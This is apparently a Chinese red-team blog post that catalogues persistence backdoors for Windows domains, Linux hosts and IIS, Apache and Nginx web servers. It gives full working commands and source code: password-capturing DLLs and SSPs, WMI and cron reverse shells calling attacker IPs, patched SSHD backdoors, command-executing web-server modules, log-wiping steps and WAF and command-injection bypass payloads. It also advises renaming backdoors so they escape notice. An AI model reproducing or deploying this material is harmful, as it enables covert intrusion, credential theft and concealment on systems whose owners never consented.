在C:\Windows\System32 新建文件system.ini第一行是连接的ip 第二行是端口
Password Filter DLL https:
visualstudio生成解决方案
DLL放在%windir%\system32\下
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa下的Notification Packages,添加Win32Project3
> REG QUERY "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "Notification Packages"
> REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "Notification Packages" /t REG_MULTI_SZ /d "scecli\0rassfm\0Win32Project3" /f
重启之后只要修改用户的密码,即可记录
文件默认在C盘根目录,可在源码中修改
WMIC事件订阅 每隔30秒加载一次payload
> wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="BotFilter82" , EventNameSpace="root\cimv2" ,QueryLanguage="WQL" , Query="SELECT * FROM __InstanceModificationEvent WITHIN 30 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
> wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="BotConsumer23" ,CommandLineTemplate="远程调用(powershell,regsvr32,mshta等)"
> wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"BotFilter82\"" , Consumer="CommandLineEventConsumer.Name=\"BotConsumer23\""
重启维持 卸载后门
>Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='BotFilter82'" | Remove-WmiObject -Verbose
>Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='BotConsumer23'" | Remove-WmiObject -Verbose
>Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%BotFilter82%'" | Remove-WmiObject -Verbose
WMI-Persistence https:
cobalt strike ->payload generator->powershell(use x64 )
attack->文件下载,文件选择payload generator的脚本,local uri为随意文件
生成后地址替换进WMI-Persistence脚本内
PS > Import-Module .\WMI-Persistence.ps1
PS > Install-Persistence
PS > Check-WMI 重启后即可上线system权限(要等待4 -6 分钟)
自定义上线
attack-> 文件下载,exe木马指定为文件。local uri为随意文件,wmi.xsl放在web目录
修改wmi.xsl
<?xml version='1.0'?>
<stylesheet
xmlns ="http://www.w3.org/1999/XSL/Transform" xmlns:ms ="urn:schemas-microsoft-com:xslt"
xmlns:user ="placeholder"
version ="1.0" >
<output method ="text" />
<ms:script implements-prefix ="user" language ="JScript" >
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c certutil -urlcache -split -f http://192.168.0.107/load.jpg %temp%/load.exe & %temp%/load.exe & certutil.exe -urlcache -split -f http://192.168.0.107/load.jpg delete",0);
]]> </ms:script >
</stylesheet >
WMI-Persistence脚本修改payload地址为wmi.xsl
$finalPayload =" wmic os get /FORMAT:`" $Payload `""
>powershell -exec bypass
PS > Import-Module .\WMI-Persistence.ps1
PS > Install-Persistence
PS > Check-WMI
PS > Remove-Persistence 删除模块
重启后即可上线
Invoke-Tasksbackdoor > powershell.exe -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.103/Invoke-taskBackdoor.ps1');Invoke-Tasksbackdoor -method nccat -ip 192.168.0.103 -port 9999 -time 2"
> powershell.exe -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.103/Invoke-taskBackdoor.ps1');Invoke-Tasksbackdoor -method msf -ip 192.168.0.103 -port 8081 -time 2"
Invoke-ADSBackdoor 使用ADS创建一个隐藏文件,创建一个计划任务每隔一分钟请求一次攻击。
> powershell.exe -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Backdoors/Invoke-ADSBackdoor.ps1'); Invoke-ADSBackdoor -PayloadURL http://192.168.0.107/ps/Schtasks-Backdoor.ps1 -Arguments 'Invoke-Tasksbackdoor -method nccat -ip 192.168.0.107 -port 12138 -time 1'"
生成 >msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168 .0 .107 LPORT=12138 -f powershell -o /var /www/html/ads #use exploit/multi/handler #set payload windows/x64/meterpreter/reverse_https #run
ADS隐藏webshell 指定宿主文件,index.php是网页正常文件
>echo ^<?php @eval ($_POST['chopper' ]);?^> > index.php:hidden.jpg
<?php include (‘index.php:hidden.jpg’)?>
<?php
$a="696E6465782E7068703" ."A68696464656E2E6A7067" ;
$b="a" ;
include (PACK('H*' ,$$b))
?>
>echo 9527 > 1. txt:flag.txt
>notepad 1. txt:flag.txt
或不指定宿主文件
>echo hide > :key.txt
>cd ../
>notepad test:key.txt
上传处绕过
上传的文件名 服务器表面现象 生成的文件内容 test.php:a.jpg 生成test.php 空 test.php::$DATA 生成test.php test.php::$INDEX_ALLOCATION 生成test.php文件夹 \ test.php::$DATA\0.jpg 生成0.jpg
ADS&JavaScript 创建一个txt文件,test.txt,随便添加内容(实际的工具,即用户要用的那个工具)。
将程序写入文件流(此处用calc.exe)
>type calc.exe > test.txt:calc.exe
使用mklink创建文件链接:
>mklink config.txt test.txt:calc.exe
创建readme.txt,文件内容随便。设置为隐藏。
创建readme.js,内容如下:
var objShell = new ActiveXObject("shell.application" );
objShell.ShellExecute("cmd.exe" , "/c config.txt" , "" , "open" , 0 );
objShell.ShellExecute("README.txt" , "" , "" , "open" , 1 );
执行readme.js,运行calc.exe ,打开readme.txt
Empire LNK后门 Empire
Empire> set Host http://192.168.1.150
Empire> set Port 8080
> launcher powershell Listener's Name
生成后只使用Base64的代码。
> powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(' http://192.168.0.107/ps/Invoke-BackdoorLNK.ps1');Invoke-BackdoorLNK -LNKPath ' C:\Users\Administrator.DC\Desktop\Easy CHM.lnk' -EncScript Base64编码"
清除后门
> powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-BackdoorLNK.ps1');Invoke-BackdoorLNK -LNKPath 'C:\Users\Administrator.DC\Desktop\Easy CHM.lnk' -CleanUp"
WMI Empire> powershell/persistence/elevated/wmi
注入SSP被动收集密码 需高权限
Mimikatz 重启失效
>privilege ::debug
>misc ::memssp
锁屏
>rundll32 .exe user32 .dll ,LockWorkStation
登录的账号密码保存在
C:\Windows\System32\mimilsa.log
重启有效
将mimikatz中的mimilib.dll放入system32目录
> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages" 查看注册表
> reg add "hklm\system\currentcontrolset\control\lsa\" /v " Security Packages" /d " kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ 添加mimilib
有账号登录密码保存在C:\Windows\System32\kiwissp.log重启也有效
Empire 复制mimilib.dll到system32文件夹中
> shell copy mimilib.dll C:\Windows\System32\
使用模块
> usemodule persistence/misc/install_ssp*
> set Path C:\Users\Administrator\mimilib.dll
Powersploit > Import-Module .\PowerSploit.psm1
> Install-SSP -Path .\mimilib.dll
基于域策略文件权限后门 域的组策略和脚本存放在域控机的C:\Windows\SYSVOL\sysvol\zone.com\Policies目录,域内机器定时访问以更新策略
域控机设置policies为everyone完全控制
> cacls C:\Windows\SYSVOL\sysvol\zone.com\Policies /e /t /c /g "EveryOne" :f
使用powerview查询域内机对应策略文件
PS> Get-NETGPO -ComputerName sub2k8.zone.com |fl gpcfilesyspath
打开C:\Windows\SYSVOL\sysvol\zone.com\Policies\{id}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf末尾添加
[Registry Values] MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskhost.exe\Debugger=1,c:\windows\system32\calc.exe [Version] signature="$CHICAGO$" Revision=1
手动刷新策略
>gpupdate /force
劫持taskhost.exe,可替换c:\windows\system32\calc.exe为后门文件或语句。
Kerberoasting后门 当有setspn权限时,为域用户添加一个SPN >setspn -U -A RDP/zone.com godadmin
域内任何主机可以使用Kerberoast 获得TGS https://github.com/malachitheninja/Invoke-Kerberoast
> Invoke-Kerberoast -AdminCount -OutputFormat Hashcat | Select hash | ConvertTo-CSV -NoTypeInformation |Out-File xx.txt
或使用rubeus.exe
破解
>hashcat -m 13100 -a 0 kerberos .txt wordlist .txt
S4U2Self后门 域控执行,寻找具备SPN且密码永不过期的账户
>Get-ADUser -Filter * -Properties ServicePrincipalName,PasswordNeverExpires| ? {($_.ServicePrincipalName -ne "" ) -and ($_.PasswordNeverExpires -eq $true)}
使用mimikatz的dcsync提取用户hash
> lsadump::dcsync /domain:zone.com /user:y
布置后门
>Set -ADUser krbtgt -PrincipalsAllowedToDelegateToAccount 账户
布置完成后利用,登录账户y 触发后门
> Rubeus.exe s4u /user:y /aes256:{aes256} /domain:zone.com /msdsspn:krbtgt /impersonateuser:godadmin
注入票据,获取域控的CIFS、LDAP服务
> Rubeus.exe asktgs /ticket:{} /service:cifs/dc.zone.com,ldap/dc.zone.com /ptt
受限委派后门 http: //192.168.0.107/ps /nishang/ ActiveDirectory/Add-ConstrainedDelegationBackdoor.ps1
新增一个受限委派服务账户,或添加受限委派后门功能给一个已知账户密码存在的服务账户。
需运行在域控制器上,本次演示的是新建后门账户,若是给已知账户密码的服务账户添加功能,步骤一致。
PS > Add-ConstrainedDelegationBackdoor -SamAccountName backdoor -Domain zone.com -AllowedToDelegateTo ldap/dc.zone.com
密码默认为Password@123!可以修改脚本中$Password参数修改密码。
https://github.com/samratashok/ADModule
导入ADModule中的Microsoft.ActiveDirectory.Management.dll和Import-ActiveDirectory.ps1
> Import-Module Microsoft.ActiveDirectory.Management.dll -Verbose
> Import-Module Import-ActiveDirectory.ps1
现以域内普通用户y登录一台域内机器sub2k8,使用kekeo获取TGT
Kekeo# tgt::ask /user:backdoor /domain:zone.com /password:Passowrd@123!
使用mimikatz写入TGS票据
mimikatz #kerberos ::ptt C :\Users \y .ZONE \Desktop \kekeo \x64 \TGS_godadmin @zone .com @ZONE .COM_ldap ~dc .zone .com @ZONE .COM .kirbi
接下来就可以dcsync导出krbtgt的hash,通过krbtgt伪造黄金票据
Skeleton Key万能钥匙 域控上使用mimikatz执行
> privilege::debug
> misc::skeleton
可以使用域内任何账号以密码mimikatz登录任意域内主机 使用Empire模块
> usemodule persistence/misc/skeleton_key*
绕过LSA Protection
> privilege::debug
> !+
> !processprotect /process:lsass.exe /remove
> misc::skeleton
唯一IP访问 > msfvenom -p windows/shell_hidden_bind_tcp LPORT=443 AHOST=192.168.0.107 -f exe > svchost.exe
只有当107这台机器连接时可获得shell,其他机器不可以。
Linux cron后门 >msfvenom -p cmd/unix/reverse_bash LHOST=192.168.0.107 LPORT=12138 -f raw > /var/www/html/shell.sh
(crontab -l;printf "*/1 * * * * /bin/bash /tmp/shell.sh;/bin/bash --noprofile -i;\rno crontab for `whoami` %100c\n")|crontab -
#!bash
(crontab -l;printf "*/60 * * * * exec 9<> /dev/tcp/192.168.1.1/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n" )|crontab -
Strace记录ssh密码 安装strace
添加
alias ssh='strace -o /tmp/.log -e read,write,connect -s 2048 ssh'
SSHD后门 > ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337;
执行后开启31337端口,使用root任意密码登录
> ssh root@192.168.1.1 -p 31337
进程注入 http:
靶机>./cymothoa -p 进程PID -s 1 -y 端口
攻击机>nc -vv ip 端口
SSH wrapper后门 # cd /usr/sbin
# mv sshd ../bin
# echo '#!/usr/bin/perl' >sshd
# echo 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..4A/);' >>sshd
# echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd
# chmod u+x sshd
# /etc/init.d/sshd restart
攻击机执行
> socat STDIO TCP4:192.168.0.110:22,sourceport=13377
SUID Shell > cp /bin/bash /tmp/tmp
> chmod u+s /tmp/tmp
> /tmp/tmp -p
SSH公私钥登录 >vim /etc/ssh/sshd_conf取消以下注释
> ssh-keygen生成
复制/root/.ssh/id_rsa.pub文件到攻击端的/root/.ssh/authorized_keys
> ssh -i id_rsa targer@1.1.1.1
Reptile https:
安装
>apt install build-essential libncurses-dev linux-headers-$(uname -r)
>git clone https:
Kbeast_rootkit http ://core.ipsecs.com/rootkit/kernel-rootkit/ipsecs-kbeast-v1.tar.gz
version - 0 : 2.6.18 (RHEL/CentOS 5.x)
1 : 2.6.32 (Ubuntu 10.x) [default version]
修改配置config.h
安装路径、日志路径、端口、连接密码、连接用户
./setup build
攻击机连接
> telnet 192.168.1.1 13377
OpenSSH后门 下载
http://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz
http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz
备份配置文件
> mv /etc/ssh/ssh_config /etc/ssh/ssh_config.old
> mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old
安装关联文件
centos
> yum install -y openssl openssl-devel pam-devel zlib zlib-devel
Ubuntu
> apt-get install -y openssl libssl-dev libpam0g-dev
> tar zxvf openssh-5.9p1.tar.gz
> tar zxvf 0x06-openssh-5.9p1.patch.tar.gz
> cp openssh-5.9p1.patch/sshbd5.9p1.diff openssh-5.9p1/
> cd openssh-5.9p1
> patch <sshbd5.9p1.diff
> vim includes.h
/tmp/ilog记录登录到本机的用户密码 /tmp/olog记录本机登录其他机器的账户密码 日志文件前可以加个.隐藏起来 SECRETPW是连接后门密码 查看当前版本 >ssh -V
修改version.h改为当前版本
编译安装
Centos7
> ./configure --prefix=/usr/ --sysconfdir=/etc/ssh/ --with-pam --with-kerberos5
> make clean
> make && make install
> systemctl restart sshd.service
ubuntu
> ./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam
> make clean
> make&&make install
重启服务,修改文件日志
> touch -r/etc/ssh/ssh_config.old /etc/ssh/ssh_config
> touch -r/etc/ssh/sshd_config.old /etc/ssh/sshd_config
清除痕迹
> export HISTFILE=/dev/null
> export HISTSIZE=0
> export HISTFILESIZE=0
> sed -i 's/192.168.0.1/127.0.0.1/g' /root/.bash_history
IPTables端口复用 > iptables -t nat -N LETMEIN
> iptables -t nat -A LETMEIN -p tcp -j REDIRECT --to-port 22
# 开启开关
> iptables -A INPUT -p tcp -m string --string 'threathuntercoming' --algo bm -m recent --set --name letmein --rsource -j ACCEPT
# 关闭开关
> iptables -A INPUT -p tcp -m string --string 'threathunterleaving' --algo bm -m recent --name letmein --remove -j ACCEPT
> iptables -t nat -A PREROUTING -p tcp --dport 80 --syn -m recent --rcheck --seconds 3600 --name letmein --rsource -j LETMEIN
攻击端:
# 开启复用
> echo threathuntercoming | socat - tcp:192.168.0.110:80
# ssh使用80端口进行登录
ssh -p 80 root@192.168.0.110
# 关闭复用
echo threathunterleaving | socat - tcp:192.168.0.110:80
文件处理 >chattr +I shell.sh
>vim .shell.sh
>attrib +s +h +r 1.txt
>touch -r 1.f ile 2.f ile 修改2f ile文件的时间跟1f ile时间相同
IIS_Bin_Backdoor From:https://github.com/WBGlIl/IIS_backdoor
IIS_backdoor_dll.dl放入 web 目录的 bin 文件夹中配置 web.config 文件
<?xml version="1.0" encoding="UTF-8"?>
<configuration >
<system.webServer >
<modules >
<add name ="IIS_backdoor" type ="IIS_backdoor_dll.IISModule" />
</modules >
</system.webServer >
</configuration >
IIS_backdoor_shell.exe执行命令
使用IISBackdoor太明显,容易被看出是后门,这里对后门改名
重新生成解决方案,dll放入bin目录,web.config修改为
<?xml version="1.0" encoding="UTF-8"?>
<configuration >
<system.webServer >
<modules >
<add name ="UrlRoutingModule" type ="UrlRoutingModule.IISModule" />
</modules >
</system.webServer >
</configuration >
添加完之后会自动在模块中注册好
执行payload,msf生成raw格式payload,选择shellcode选项,raw文件拖入即可
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168 .0 .108 LPORT=12138 -f raw -o /var /www/html/1. raw
IIS_NETDLL_Spy From:https:
原作者提及三种方式,第一种编译代码为DLL新建aspx文件实例化后门类来执行命令,第二种是做httphandler映射可指定一个后缀执行命令保存文件在web服务器上,再读取结果。第三种是使用jsc.exe编译js脚本生成dll,添加映射菜刀连接。
这里根据原作者的代码,进行了一下简单的修改,修改后的功能为添加httphandler映射指定一个后缀执行命令显示在页面上,不用保存在服务器中再访问。
代码
using System;
using System.Diagnostics;
using System.IO;
using System.Text;
using System.Web;
namespace IsapiModules
{
public class Handler : IHttpHandler
{
public bool IsReusable
{
get
{
return false ;
}
}
public void ProcessRequest (HttpContext context )
{
string input = context.Request.Form["InternetInformationService" ];
if (context.Request.Form["microsoft" ] == "iis" )
{
this .cmdShell(input);
}
}
public void cmdShell (string input )
{
Process process = new Process();
process.StartInfo.FileName = "cmd.exe" ;
process.StartInfo.RedirectStandardOutput = true ;
process.StartInfo.UseShellExecute = false ;
process.StartInfo.Arguments = "/c " + input;
process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
process.Start();
StreamReader output = process.StandardOutput;
String result = output.ReadToEnd();
output.Close();
output.Dispose();
HttpContext.Current.Response.Write(result);
}
}
}
保存为随意后缀,使用csc编译。
> C:\Windows\Microsoft.NET\Framework\v2.50727\csc.exe /t:library /r:System.Web.dll -out:C:\inetpub\wwwroot\Bin\SystemIO.dll C:\inetpub\wwwroot\bin\code.cs
Web.config文件添加
<system.webServer >
<handlers >
<add name ="PageHandlerFactory-ISAPI-2.0-32" path ="*.xxx" verb ="*" type ="IsapiModules.Handler" resourceType ="Unspecified" requireAccess ="Script" preCondition ="integratedMode" />
</handlers >
</system.webServer >
打开IIS管理器,可以看到处理映射管理器中已经添加了模块。
现在随意访问个xxx后缀的文件
带参数访问 microsoft=iis&InternetInformationService=net user
第三种连接菜刀,这里也对代码修改了一下。
import System;
import System.Web;
import System.IO;
package IsapiModule
{
public class Handler implements IHttpHandler
{
function IHttpHandler .ProcessRequest (context : HttpContext )
{
context.Response.Write("404 Not Found" )
var I = context;
var Request = I.Request;
var Response = I.Response;
var Server = I.Server;
eval (context.Request["Internet" ]);
}
function get IHttpHandler .IsReusable ( ) : Boolean { return true }
}
}
使用jsc编译
>C:\Windows\Microsoft.NET\Framework\v4.0 .30319 \jsc.exe /t:library -out:C:\inetpub\wwwroot\Bin\IsapiModule.Handler.dll C:\inetpub\wwwroot\bin\code.js
编辑web.config,添加映射,这里指定的后缀是.iis
<system.webServer >
<modules runAllManagedModulesForAllRequests ="true" /> <directoryBrowse enabled ="true" />
<staticContent >
<mimeMap fileExtension =".json" mimeType ="application/json" />
</staticContent >
<handlers >
<add name ="PageHandlerFactory-ISAPI-2.0-32-1" path ="*.iis" verb ="*" type ="IsapiModule.Handler" preCondition ="integratedMode" />
</handlers >
</system.webServer >
已自动加入了映射。现在随便访问个iis后缀的文件。
可使用菜刀直接连接
IIS_RAID From :https:
在vs2019下编译
在Functions .h中修改连接密码,passfile是dump 下来的密码保存的位置,com_header是后门和服务器通信的请求头。
打开项目修改完你的密码,直接ctrl+B生成解决方案即可(这里生成的是release版本) Dll传到服务器,改个名字,执行添加模块
>C:\Windows\system32\inetsrv\APPCMD.EXE install module /name:IsapiDotNet /image:"c:\windows\system32\inetsrv\IsapiDotNet.dll" /add:true
在模块中可以看到已经存在了
远程连接
> python3 iis_controller.py --url http://192.168.0.98 --password thisismykey
执行命令的方式是
> cmd +命令
Dump命令可以dump下来IIS站点的登录的信息,保存在设置的位置。 Inject可以执行shellcode Cs/msf生成raw格式的shellcode >inject 位置
JAVA Web Backdoor From:https:
https:
当获取一个webshell或bashshell权限时,下载后门执行注入进程形成无文件复活后门
下载后解压到任意web目录
得到2个jar文件 执行,password设置为你的密码 >java -jar inject.jar password
注入成功,在web任意页面任意url执行命令
可执行命令,反弹shell,上传/下载文件,列目录,读文件,添加代理,连接菜刀
Tomcat JSP HideShell From:https://mp .weixin.qq.com/s/7b3Fyu_K6ZRgKlp6RkdYoA
https://github .com/QAX-A-Team/HideShell
把自己的shell和hideshell传入靶机,先访问自己的shell,目的是为了让 Tomcat 将它编译,并生成 JspServletWrapper 保存在 JspRuntimeContext 中。
再访问hideshell.jsp,点击hide你的shell。
已经隐藏了
再访问hideshell.jsp,可以看到隐藏后的shell的文件名。
访问看看
当然,也可以把hideshell自身隐藏了,那访问它的方式就是hidden-hideshell.jsp
目录里啥都没了
此方式隐藏之后请求不会产生日志
那如果把shelltest文件夹删掉权限还会在吗?
是在的
Apache Module后门1 From:https:
生成模板结构
>apxs -g -n auth
编辑mod_auth.c文件
#include "httpd.h"
#include "http_config.h"
#include "http_protocol.h"
#include "ap_config.h"
#include <stdio.h>
#include <stdlib.h>
static int auth_handler (request_rec *r)
{
const apr_array_header_t *fields;
int i;
apr_table_entry_t *e = 0 ;
char FLAG = 0 ;
fields = apr_table_elts(r->headers_in);
e = (apr_table_entry_t *) fields->elts;
for (i = 0 ; i < fields->nelts; i++) {
if (strcmp (e[i].key, "Authorizations" ) == 0 ){
FLAG = 1 ;
break ;
}
}
if (FLAG){
char * command = e[i].val;
FILE* fp = popen(command,"r" );
char buffer[0x100 ] = {0 };
int counter = 1 ;
while (counter){
counter = fread(buffer, 1 , sizeof (buffer), fp);
ap_rwrite(buffer, counter, r);
}
pclose(fp);
return DONE;
}
return DECLINED;
}
static void auth_register_hooks (apr_pool_t *p)
{
ap_hook_handler(auth_handler, NULL , NULL , APR_HOOK_MIDDLE);
}
module AP_MODULE_DECLARE_DATA auth_module = {
STANDARD20_MODULE_STUFF,
NULL ,
NULL ,
NULL ,
NULL ,
NULL ,
auth_register_hooks
};
编译后重启apache
>apxs -i -a -c mod_auth.c && service apache2 restart
原文件接受的头是backdoor太明显,这里换成了Authorizations
或使用python来执行
import requests
import sys
def exploit (host, port, command) :
headers = {
"Authorizations" : command
}
url = "http://%s:%d/" % (host, port)
response = requests.get(url, headers=headers)
content = response.content
print content
def main () :
if len(sys.argv) != 3 :
print "Usage : "
print "\tpython %s [HOST] [PORT]" % (sys.argv[0 ])
exit(1 )
host = sys.argv[1 ]
port = int(sys.argv[2 ])
while True :
command = raw_input("$ " )
if command == "exit" :
break
exploit(host, port, command)
if __name__ == "__main__" :
main()
Apache Module后门2
From:https://github.com/VladRico/apache2_BackdoorMod
.load文件传入/etc/apache2/mods-available/目录,.so文件传入/usr/lib/apache2/modules/目录
启动后门模块,重启apache
>a2enmod backdoor&service apache2 restart
Cookie里添加字段password=backdoor 访问http://ip/ping返回如下图说明后门正常允许
访问http://ip/revtty/192.168.0.107/12138 开启反向连接,攻击机109执行nc监听12138即可
访问http://ip/proxy/1337开启socks代理
想要结束socks代理可执行 >echo "imdonewithyou" |nc 192.168.0.111 1337
即可结束socks代理 以上原作者的文件命名backdoor太明显,可以自己修改文件重新编译 创建模板结构命名为phpmodev
修改cookie内容为迷惑字段Authorizations=PHPSESSIONID
Apache Module后门3 From: https:
生成模板结构
>apxs -g -n phpdevmod
编辑mod_phpdevmod.c文件 编译 >make -e CC=x86_64-linux-gnu-g++
生成的.so文件在/.libs目录下
将其复制到/usr/lib/apache2/modules/目录
修改/etc/apache2/mods-enabled/php7.0.load文件,添加如下
LoadModule phpdevmod_module /usr/lib/apache2/modules/mod_phpdevmod.so
<Location /qq.jpg > #可以设置为任何不存在的文件
setHandler phpdevmod
</Location >
需重启apache服务 访问后门方式http://ip/qq.jpg?命令的url编码 直接访问后门文件
636174202F6574632F706173737764为cat /etc/passwd的url编码
Nginx Lua后门 From:https://github.com/netxfly/nginx_lua_security https://github.com/Y4er/Y4er.com/blob/251d88d8a3cf21e9bafe15c43d7900ffeacfa7ea/content/post/nginx-lua-backdoor.md 后门利用的前提是获取到root权限,nginx安装有lua模块。 在nginx.conf中http节处添加,指定lua脚本位置,以及nginx启动时加载的脚本
在lua目录/waf/中新建Init.lua,内容如下,require nginx表示加载nginx.lua中的模块。
/waf/目录中新建nginx.lua实现执行命令,参数为waf。
在nginx配置文件中加入location。
效果:
PwnNginx From:https:
解压好后编译客户端
>make
编辑nginx的源文件/src/core/nginx.c找到configure arguments:在后面添加--prefix=/usr/local/nginx\n指定的是nginx安装的目录
重新编译nginx添加后门模块 >./configure --prefix=/usr/local/nginx/ --add-module=/tmp/pwnginx-master/module
>make
覆盖新的nginx到原nginx目录
> cp -f objs/nginx /usr/local /nginx/sbin/nginx
重启nginx
> killall nginx&/usr/local /nginx/sbin/nginx
连接
> ./pwnginx shell 目标机 nginx端口 密码
默认密码是t57root,密码的配置文件在pwnginx-master\module\config.h文件夹中,可在重新编译nginx前修改密码
此后门也可开启socks隧道
红队tips 父进程破坏 命令explorer.exe / root与cmd.exe / c 类似,只不过使用explorer会破坏进程树,会创建新实例explorer.exe,使之成为新实例下的子进程
loT高频率账户密码 Bypass mod_security Xss和注入bypass mod_security
/*!50000 %75%6e%69on*/ %73%65%6cect 1,2,3,4... –
<marquee loop=1 width=0 onfinish=pr\u006fmpt(document.cookie)>Y000</marquee >
/*!50000%75%6e%69on*/ %73%65%6cect 1 ,2 ,3 ,4 ,5 —
%75%6e%69on = union
%73%65%6cect = select
%75%6e%69 = uni = url encode
%73%65%6c = sel = url encode
查找git和svn的字典
Top 25 重定向dorks
使用grep快速去除垃圾数据 curl http: //host.xx/file .js | grep -Eo "(http| https):// [a-zA-Z0 -9 ./?=_ -]*"*
cat file | grep -Eo " (http|https)://[a-zA-Z0-9./?=_-]*"*
已泄露的密码整理出的字典 https:
从网上泄露的10 亿条数据中整理出的。里面257 ,669 ,588 被筛选为损坏的数据或测试账户。
10 亿个凭据可归结为168 ,919 ,919 密码和393 ,386 ,953 用户名.
平均密码长度为9.4822 个字符
12.04 %包含特殊字符,28.79 %密码仅是字母,26.16 %仅是小写,13.37 %仅是数字,8.83 %的密码仅被发现一次
与rockyou的对比,rockyou包含14 ,344 ,391 个密码,本字典与rockyou相差80 %
还有根据不同国家生成的小字典
命令注入Bypass From: @shreyasrx
cat /etc/passwd
cat /e"t" c/pa"s" swd
cat /'e' tc/pa's' swd
cat /etc/pa??wd
cat /etc/pa*wd
cat /et' ' c/passw' ' d
cat /et$()c/pa$()$swd
cat /et${neko} c/pas${poi} swd
*echo "dwssap/cte/ tac" | rev
$(echo Y2FOIC9ldGMvcGFzc3dkCg== base64 -d)
w\ho\am\i
/\b\i\n/////s\h
who$@ami
xyz%0Acat%20/etc/passwd
IFS=,;`cat<<<uname,-a`
/???/??t /???/p??s??
test =/ehhh/hmtc/pahhh/hmsswd
cat ${test//hhh\/hm/}
cat ${test//hh??hm/}
cat /???/?????d
{cat,/etc/passwd}
往期精彩
感兴趣的可以点个关注 !!!